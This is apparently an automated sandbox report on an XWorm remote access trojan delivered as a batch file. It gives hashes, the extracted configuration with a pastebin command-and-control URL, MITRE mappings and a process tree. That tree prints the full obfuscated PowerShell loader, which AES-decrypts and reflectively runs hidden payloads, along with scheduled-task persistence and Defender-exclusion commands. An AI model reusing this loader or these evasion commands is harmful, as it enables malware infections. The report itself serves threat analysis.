xworm | 34f1b41e2547cf79b54e6b174f7b9b2be3f918fa52e831606f58de55513df91e

Analysis

max time kernel
149s
max time network
149s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
30/04/2024, 19:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader-upd.bat
Size

295KB
MD5

e0b1638feea307a3afbeacaec7fd506c
SHA1

16d849c8f90412a612e1fc0eed6e406f076d4099
SHA256

34f1b41e2547cf79b54e6b174f7b9b2be3f918fa52e831606f58de55513df91e
SHA512

795e2418636e320eb8cd381066ac5ef4ef479b770d1bab1a7221aba15d7fa9e7d54b996dac1b93fa9068e57c5ee369fd5024ce916c6de07e48f1ff8d51863a5e
SSDEEP

6144:yll7goJPFab7YvftLMYUQK4UHF8WkA0dXTwxl:MlnabilLMYHbTDlSl

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%Public%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/UWpQULMP

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3004-47-0x000001D3C0A30000-0x000001D3C0A48000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Executes dropped EXE 2 IoCs

pid	Process
2316	svchost.exe
3360	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-293923083-2364846840-4256557006-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Public\\svchost.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
5	pastebin.com
9	pastebin.com
10	pastebin.com
3	pastebin.com
7	pastebin.com
11	pastebin.com
12	pastebin.com
13	pastebin.com
14	pastebin.com
1	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3272	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-293923083-2364846840-4256557006-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1120	powershell.exe
1120	powershell.exe
4960	powershell.exe
4960	powershell.exe
3004	powershell.exe
3004	powershell.exe
4616	powershell.exe
4616	powershell.exe
3820	powershell.exe
3820	powershell.exe
2700	powershell.exe
2700	powershell.exe
240	powershell.exe
240	powershell.exe
2316	svchost.exe
2316	svchost.exe
3360	svchost.exe
3360	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeIncreaseQuotaPrivilege	4960	powershell.exe
Token: SeSecurityPrivilege	4960	powershell.exe
Token: SeTakeOwnershipPrivilege	4960	powershell.exe
Token: SeLoadDriverPrivilege	4960	powershell.exe
Token: SeSystemProfilePrivilege	4960	powershell.exe
Token: SeSystemtimePrivilege	4960	powershell.exe
Token: SeProfSingleProcessPrivilege	4960	powershell.exe
Token: SeIncBasePriorityPrivilege	4960	powershell.exe
Token: SeCreatePagefilePrivilege	4960	powershell.exe
Token: SeBackupPrivilege	4960	powershell.exe
Token: SeRestorePrivilege	4960	powershell.exe
Token: SeShutdownPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeSystemEnvironmentPrivilege	4960	powershell.exe
Token: SeRemoteShutdownPrivilege	4960	powershell.exe
Token: SeUndockPrivilege	4960	powershell.exe
Token: SeManageVolumePrivilege	4960	powershell.exe
Token: 33	4960	powershell.exe
Token: 34	4960	powershell.exe
Token: 35	4960	powershell.exe
Token: 36	4960	powershell.exe
Token: SeIncreaseQuotaPrivilege	4960	powershell.exe
Token: SeSecurityPrivilege	4960	powershell.exe
Token: SeTakeOwnershipPrivilege	4960	powershell.exe
Token: SeLoadDriverPrivilege	4960	powershell.exe
Token: SeSystemProfilePrivilege	4960	powershell.exe
Token: SeSystemtimePrivilege	4960	powershell.exe
Token: SeProfSingleProcessPrivilege	4960	powershell.exe
Token: SeIncBasePriorityPrivilege	4960	powershell.exe
Token: SeCreatePagefilePrivilege	4960	powershell.exe
Token: SeBackupPrivilege	4960	powershell.exe
Token: SeRestorePrivilege	4960	powershell.exe
Token: SeShutdownPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeSystemEnvironmentPrivilege	4960	powershell.exe
Token: SeRemoteShutdownPrivilege	4960	powershell.exe
Token: SeUndockPrivilege	4960	powershell.exe
Token: SeManageVolumePrivilege	4960	powershell.exe
Token: 33	4960	powershell.exe
Token: 34	4960	powershell.exe
Token: 35	4960	powershell.exe
Token: 36	4960	powershell.exe
Token: SeIncreaseQuotaPrivilege	4960	powershell.exe
Token: SeSecurityPrivilege	4960	powershell.exe
Token: SeTakeOwnershipPrivilege	4960	powershell.exe
Token: SeLoadDriverPrivilege	4960	powershell.exe
Token: SeSystemProfilePrivilege	4960	powershell.exe
Token: SeSystemtimePrivilege	4960	powershell.exe
Token: SeProfSingleProcessPrivilege	4960	powershell.exe
Token: SeIncBasePriorityPrivilege	4960	powershell.exe
Token: SeCreatePagefilePrivilege	4960	powershell.exe
Token: SeBackupPrivilege	4960	powershell.exe
Token: SeRestorePrivilege	4960	powershell.exe
Token: SeShutdownPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeSystemEnvironmentPrivilege	4960	powershell.exe
Token: SeRemoteShutdownPrivilege	4960	powershell.exe
Token: SeUndockPrivilege	4960	powershell.exe
Token: SeManageVolumePrivilege	4960	powershell.exe
Token: 33	4960	powershell.exe
Token: 34	4960	powershell.exe
Token: 35	4960	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 4900 wrote to memory of 2976	4900	cmd.exe	81
PID 4900 wrote to memory of 2976	4900	cmd.exe	81
PID 2976 wrote to memory of 3272	2976	net.exe	82
PID 2976 wrote to memory of 3272	2976	net.exe	82
PID 4900 wrote to memory of 1120	4900	cmd.exe	84
PID 4900 wrote to memory of 1120	4900	cmd.exe	84
PID 1120 wrote to memory of 4960	1120	powershell.exe	86
PID 1120 wrote to memory of 4960	1120	powershell.exe	86
PID 1120 wrote to memory of 436	1120	powershell.exe	88
PID 1120 wrote to memory of 436	1120	powershell.exe	88
PID 436 wrote to memory of 1180	436	WScript.exe	89
PID 436 wrote to memory of 1180	436	WScript.exe	89
PID 1180 wrote to memory of 1544	1180	cmd.exe	91
PID 1180 wrote to memory of 1544	1180	cmd.exe	91
PID 1544 wrote to memory of 2664	1544	net.exe	92
PID 1544 wrote to memory of 2664	1544	net.exe	92
PID 1180 wrote to memory of 3004	1180	cmd.exe	94
PID 1180 wrote to memory of 3004	1180	cmd.exe	94
PID 3004 wrote to memory of 4616	3004	powershell.exe	96
PID 3004 wrote to memory of 4616	3004	powershell.exe	96
PID 3004 wrote to memory of 3820	3004	powershell.exe	98
PID 3004 wrote to memory of 3820	3004	powershell.exe	98
PID 3004 wrote to memory of 2700	3004	powershell.exe	100
PID 3004 wrote to memory of 2700	3004	powershell.exe	100
PID 3004 wrote to memory of 240	3004	powershell.exe	102
PID 3004 wrote to memory of 240	3004	powershell.exe	102
PID 3004 wrote to memory of 3272	3004	powershell.exe	104
PID 3004 wrote to memory of 3272	3004	powershell.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\loader-upd.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4900
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:3272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lzFVt/XZ9GDXtrgfp7KUrq1Ztc2rugzPUj8aolktWds='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('46ZcKkyMoGeI1RQ/MLZr7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xeoYe=New-Object System.IO.MemoryStream(,$param_var); $XWMDy=New-Object System.IO.MemoryStream; $zsdvE=New-Object System.IO.Compression.GZipStream($xeoYe, [IO.Compression.CompressionMode]::Decompress); $zsdvE.CopyTo($XWMDy); $zsdvE.Dispose(); $xeoYe.Dispose(); $XWMDy.Dispose(); $XWMDy.ToArray();}function execute_function($param_var,$param2_var){ $GDMaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pxsZU=$GDMaA.EntryPoint; $pxsZU.Invoke($null, $param2_var);}$IKYhk = 'C:\Users\Admin\AppData\Local\Temp\loader-upd.bat';$host.UI.RawUI.WindowTitle = $IKYhk;$qTuZc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IKYhk).Split([Environment]::NewLine);foreach ($GpwKA in $qTuZc) { if ($GpwKA.StartsWith(':: ')) { $FTfzC=$GpwKA.Substring(3); break; }}$payloads_var=[string[]]$FTfzC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_385_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_385.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_385.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_385.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1180
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1544
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:2664
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lzFVt/XZ9GDXtrgfp7KUrq1Ztc2rugzPUj8aolktWds='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('46ZcKkyMoGeI1RQ/MLZr7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xeoYe=New-Object System.IO.MemoryStream(,$param_var); $XWMDy=New-Object System.IO.MemoryStream; $zsdvE=New-Object System.IO.Compression.GZipStream($xeoYe, [IO.Compression.CompressionMode]::Decompress); $zsdvE.CopyTo($XWMDy); $zsdvE.Dispose(); $xeoYe.Dispose(); $XWMDy.Dispose(); $XWMDy.ToArray();}function execute_function($param_var,$param2_var){ $GDMaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pxsZU=$GDMaA.EntryPoint; $pxsZU.Invoke($null, $param2_var);}$IKYhk = 'C:\Users\Admin\AppData\Roaming\startup_str_385.bat';$host.UI.RawUI.WindowTitle = $IKYhk;$qTuZc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IKYhk).Split([Environment]::NewLine);foreach ($GpwKA in $qTuZc) { if ($GpwKA.StartsWith(':: ')) { $FTfzC=$GpwKA.Substring(3); break; }}$payloads_var=[string[]]$FTfzC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3004
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4616
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3820
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\svchost.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2700
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:240
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:3272

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3816

C:\Users\Public\svchost.exe
C:\Users\Public\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2316

C:\Users\Public\svchost.exe
C:\Users\Public\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3360

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
c81d47c3b95d180e012e8380740c4349

SHA1
702eded5bde64ab869985b0934655e18dbdc6a70

SHA256
cfaa4c0d9f07288af8d6722f228edf33b0d87a4fde1b468f0c3afb837cd061cc

SHA512
982beff2c7b39aa271d26424c51e2e10f0a3ea7e1f7321e37397e7811feb409b39408a6cb22b6dfe271cd9c1048b89f5a80e193b570d18a46b7acc2e542f21f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
824da05d0f31c23ab953467d7a3812f7

SHA1
48349c5986cb56777bf77e747eafbc2f87dfc2c1

SHA256
6d266b3c94b03d8ed8648328f707c58177b2075c963aff4cbe6576d93df518b8

SHA512
5c35ada146f86ebaefc96d82f7176f7ccabf179a5297b04fb7f56a88cb6a8a1b1bb159b04599cf8f581f49a08137530aa3cc8a1e5c67a383880c6998e84c5367

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4914eb0b2ff51bfa48484b5cc8454218

SHA1
6a7c3e36ce53b42497884d4c4a3bda438dd4374b

SHA256
7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

SHA512
83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e07eea85a8893f23fb814cf4b3ed974c

SHA1
8a8125b2890bbddbfc3531d0ee4393dbbf5936fe

SHA256
83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea

SHA512
9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_00khv1lf.co0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_385.bat

Filesize
295KB

MD5
e0b1638feea307a3afbeacaec7fd506c

SHA1
16d849c8f90412a612e1fc0eed6e406f076d4099

SHA256
34f1b41e2547cf79b54e6b174f7b9b2be3f918fa52e831606f58de55513df91e

SHA512
795e2418636e320eb8cd381066ac5ef4ef479b770d1bab1a7221aba15d7fa9e7d54b996dac1b93fa9068e57c5ee369fd5024ce916c6de07e48f1ff8d51863a5e

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_385.vbs

Filesize
115B

MD5
127dce97d01960eba9eca417779096d2

SHA1
f3738e0159d4745806c996d8c691d1b8304105f9

SHA256
4c2eb01358fb81e508520e83829d4704f517b0f6860e877fc33b57a336bba98e

SHA512
796c1f939b3196c7c6805736fe56c73273de40d1632dfff9acd006f5d763213343e92493191130a8bba0cb8794378ff628952512fb2c24e73c8c14593778da73

Download Submit
C:\Users\Public\svchost.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
memory/1120-12-0x000001EF73520000-0x000001EF73530000-memory.dmp

Filesize
64KB

Download
memory/1120-8-0x000001EF735D0000-0x000001EF735F2000-memory.dmp

Filesize
136KB

Download
memory/1120-9-0x00007FF8F2140000-0x00007FF8F2C02000-memory.dmp

Filesize
10.8MB

Download
memory/1120-10-0x000001EF73520000-0x000001EF73530000-memory.dmp

Filesize
64KB

Download
memory/1120-48-0x00007FF8F2140000-0x00007FF8F2C02000-memory.dmp

Filesize
10.8MB

Download
memory/1120-11-0x000001EF73520000-0x000001EF73530000-memory.dmp

Filesize
64KB

Download
memory/1120-14-0x000001EF73870000-0x000001EF738AA000-memory.dmp

Filesize
232KB

Download
memory/1120-13-0x000001EF73840000-0x000001EF73848000-memory.dmp

Filesize
32KB

Download
memory/2316-98-0x00000270DDD20000-0x00000270DDD66000-memory.dmp

Filesize
280KB

Download
memory/3004-47-0x000001D3C0A30000-0x000001D3C0A48000-memory.dmp

Filesize
96KB

Download
memory/4960-26-0x000001A74EEE0000-0x000001A74EEF0000-memory.dmp

Filesize
64KB

Download
memory/4960-24-0x00007FF8F2140000-0x00007FF8F2C02000-memory.dmp

Filesize
10.8MB

Download
memory/4960-29-0x00007FF8F2140000-0x00007FF8F2C02000-memory.dmp

Filesize
10.8MB

Download
memory/4960-25-0x000001A74EEE0000-0x000001A74EEF0000-memory.dmp

Filesize
64KB

Download